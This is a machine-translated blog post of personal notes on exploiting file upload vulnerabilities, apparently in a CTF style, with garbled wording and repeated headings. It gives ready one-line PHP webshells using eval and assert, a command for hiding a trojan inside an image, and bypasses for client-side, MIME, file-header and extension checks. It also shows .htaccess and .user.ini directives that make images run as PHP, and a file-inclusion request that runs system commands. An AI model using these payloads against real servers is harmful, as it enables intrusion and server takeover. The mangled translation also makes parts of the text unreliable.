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File upload vulnerability summary

2022-07-07 04:50:00 -*Xiao Kai


File upload vulnerability summary



webshell( Web Trojan file )


The pony

Picture horse

Front end validation ( client javascript verification )

Front end validation bypasses

Back-end verification ( Server side validation )

Server side MIME Type validation ( File content type detection )

Server side file content verification - The file header

Server side file extension verification

Commonly used



A common sentence is written

notes : Chicken notes , Reference as appropriate !


During development, the files uploaded by users were not strictly detected , Filter , As a result, users can upload executable script files ( Malicious files ), As a result, the server commands can be executed


Get control of the server

You can upload a file with the same file name to overwrite the original file

Vulnerable to directory traversal ;

Denial of service (DoS) attack ....

webshell( Web Trojan file )

The most common method of file upload vulnerability is to upload website Trojan horse (webshell) file ,WEBSHELL Also known as web Trojan file , According to different development languages, it can be divided into ASP Trojan horse 、PHP Trojan horse 、JSP Trojans, etc , This kind of Trojan horse uses the system command execution in the scripting language 、 Functions such as file reading and writing , Once uploaded to the server, it is parsed by the script engine , The attacker can control the server .

webshell Divided into Malaysia , The pony ( In a word, Trojans ) And pictures of horses


The functions are quite complete , But the amount of code is large , Relatively complex , Not easy to hide , Generally, encryption and other means are needed to hide

The pony

Simple function , Less code , Strong concealment

Picture horse

The website only allows uploading pictures (.png .jpg .gif) , And cannot be bypassed , Use pictures of horses

Make pictures of horses :cmd Enter command in :copy picture .jpg/b+ Trojan horse .php/a picture .jpg





webshell( Web Trojan file )


The pony

Picture horse

Front end validation ( client javascript verification )

Front end validation bypasses

Back-end verification ( Server side validation )

Server side MIME Type validation ( File content type detection )

Server side file content verification - The file header

Server side file extension verification

Commonly used



A common sentence is written

Front end validation ( client javascript verification )

Mainly detect the file suffix , Roughly divided into :

  • The blacklist : Uploaded files are not allowed

  • White list : Files allowed to be uploaded

  • When the front end has restrictions on uploading files, you can directly modify the code

    eg:  lay-data="{url: 'upload.php', accept: 'images',exts:'png'}
           Change it to :lay-data="{url: 'upload.php', accept: 'file'}

Front end validation bypasses

  • Turn off in browser settings Javascript

  • bp Grab the bag to modify ( For example, upload first 1.jpg file , Then grab the bag and change it to 1.php

Back-end verification ( Server side validation )

Server side MIME Type validation ( File content type detection )

MIME The type is to describe the message Internet standards for content types

Mainly for Content-Type:

When there are restrictions on the contents of the file , Can be Content-Type:application/octet-stream And so on :




Server side file content verification - The file header

The backend will detect the content of the uploaded file

The image format checks the file content by checking the binary at the beginning of the file , Different picture types , File headers are different .

Bypass method :

One , Add a file magic header before the file , Cheat on image content

Common file magic head :GIF89a

  • JPG: FF D8 FF EO 00 10 4A 46 49 46.

  • GIF:47 49 46 3839 61(GIF89a).

  • PNG:89 50 4E 47

Two , Use the server to parse the Trojan file into a picture file , Therefore, when sending a request to execute the file , The server will only return this “ picture ” file , The corresponding command will not be executed .

Therefore, exploit File Inclusion Vulnerability , You can treat a file in picture format as PHP File to parse and execute

.php?filename=uploads/1.jpg&pass=system('cat /flag')

Server side file extension verification

.php?filename=uploads/1.jpg&pass=system('cat /flag')

The extension of the file is filtered by the back end , The uploaded file suffixes are filtered

Bypass method :

  • Suffix case

  • Synonymous suffix replacement

php: php、 phtml、php3、php4、php5  
jsp: jap、jspx、jspf 
asp: asa、cer、aspx
ext: exee
  • Double writing bypasses :php -> phphpp

Commonly used


Reference resources : Link to the original text : Delve into user utilization .htaccess Security problems caused by tampering with configuration _ Hetian Wangan College -CSDN Blog

.htaccess file ( perhaps " Distributed profile "), The full name is Hypertext Access( Hypertext entry ). Provides a way to change the configuration for the directory , namely , Place a file containing one or more instructions in a specific document directory , To apply to this directory and all its subdirectories . As the user , The commands available are limited . Administrators can use the Apache Of ''AllowOverride'' Command to set . Here is a brief introduction ,.htaccess To put it bluntly apache A profile in the server ; It is only responsible for the configuration of web pages under relevant directories ;

htaccess The function of documents :

  • Webpage 301 Redirect

  • Customize 404 Error page

  • Change the file extension

  • Prohibit directory lists, etc

So you can use write .htacess The contents of the document :    

<FilesMatch "s1mple"> // Make the name s1mple File as php Format parsing 
Sethandler application/x-httpd-php
</Filesmatch >
  perhaps :
AddType application/x-httpd-php .jpg // take jpg The document serves as php Format parsing 


Reference resources : File upload .htaccess and .user.ini_m0_46587008 The blog of -CSDN Blog

.user.ini. It is better than .htaccess More widely used , Whether it's nginx/apache/IIS, As long as it is with fastcgi Running php You can use this method .

.user.ini The function of documents : You can change the permissions of users to read files and include files , It's more widely used , But one more condition ( More important ) There are executable files in the corresponding directory . Next, let's look at how to construct these two configuration files .

auto_prepend_file=a.jpg // Pass in front of the Trojan horse 
auto_append_file=a.jpg  // Pass in after the Trojan horse 

A common sentence is written

 <?php @eval($_POST["pass"]);?> 
<script language='php'>assert($_REQUEST['pass'])</script>
<script language="php">eval($_POST['pass'])</script>


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